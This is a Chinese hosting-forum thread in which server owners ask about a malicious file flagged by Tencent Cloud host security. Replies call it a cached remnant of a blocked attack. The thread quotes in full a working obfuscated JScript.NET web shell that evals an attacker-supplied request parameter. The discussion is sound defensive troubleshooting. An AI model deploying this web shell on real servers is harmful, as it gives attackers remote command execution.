【已解答】腾讯云【主机安全】恶意文件通知

腾讯云云服务器
系统：Ubuntu 22.04 (Jammy Jellyfish) x86_64(Py3.7.8)
宝塔版本：免费版 9.0.0 安装了第三方免费防火墙
QQ截图20250530075604.jpg

问题描述：

该文件内容如下：

<% function EY0b942T(){var GEPH="u",Ah6c7="afe",C02u=GEPH+"ns"+Ah6c7;return C02u;}var FNfe01:String=Request["a"];var FNfe01 = FNfe01.substring(0, 9999);~~~~eval/*Z#?h*u@!hXS66OqWw8*/(FNfe01,EY0b942T());%><%@Page Language = JS%>

复制代码

我技术有限，不知道是因为什么原因有这个恶意文件，烦请各位大佬抽空帮忙分析一下，万分感谢！

yeungxing · 发表于 2025-5-30 10:20:00

我好几个主机都出现了 php后边随机字符
文件内容跟你的一样

阿珂 · 发表于 2025-5-30 14:21:11

这个看起来是已经被防火墙拦截的遗留文件
删除即可

宝塔用户_vgdckc · 发表于 2025-5-31 08:30:42

阿珂发表于 2025-5-30 14:21
这个看起来是已经被防火墙拦截的遗留文件
删除即可

好的，谢谢大佬解答疑惑

出海互动 · 发表于 2025-5-31 19:56:37

阿珂发表于 2025-5-30 14:21
这个看起来是已经被防火墙拦截的遗留文件
删除即可

我们也出现了一样的告警，恶意文件内容也一模一样，但是我们目录下找不到这些文件，请问是一样的情况吗？这些文件是被宝塔删了，还是被恶意转存了？我们是企业版

出海互动 · 发表于 2025-5-31 19:59:10

阿珂发表于 2025-5-30 14:21
这个看起来是已经被防火墙拦截的遗留文件
删除即可

我们也出现了一样的告警，恶意文件内容也一模一样，但是我们目录下找不到这些文件，请问是一样的情况吗？这些文件是被宝塔删了，还是被恶意转存了？我们是企业版

宝塔用户_vgdckc · 发表于 2025-6-3 13:41:46

出海互动发表于 2025-5-31 19:59
我们也出现了一样的告警，恶意文件内容也一模一样，但是我们目录下找不到这些文件，请问是一样的情况吗？ ...

我的是免费版的，删了又会出现，文件名是php+6位随机字符，内容是一样的，反反复复，不知道怎么回事

阿珂 · 发表于 2025-6-4 11:10:10

出海互动发表于 2025-5-31 19:59
我们也出现了一样的告警，恶意文件内容也一模一样，但是我们目录下找不到这些文件，请问是一样的情况吗？ ...

这个是已经被nginx防火墙拦截下来了的，不影响，缓存文件而已
付费版nginx防火墙下个版本会进行优化

阿珂 · 发表于 2025-6-4 11:11:28

宝塔用户_vgdckc 发表于 2025-6-3 13:41
我的是免费版的，删了又会出现，文件名是php+6位随机字符，内容是一样的，反反复复，不知道怎么回事 ...

使用了免费版nginx防火墙，这个是被防火墙拦截下来了的，不影响
不嫌麻烦就手动删除一下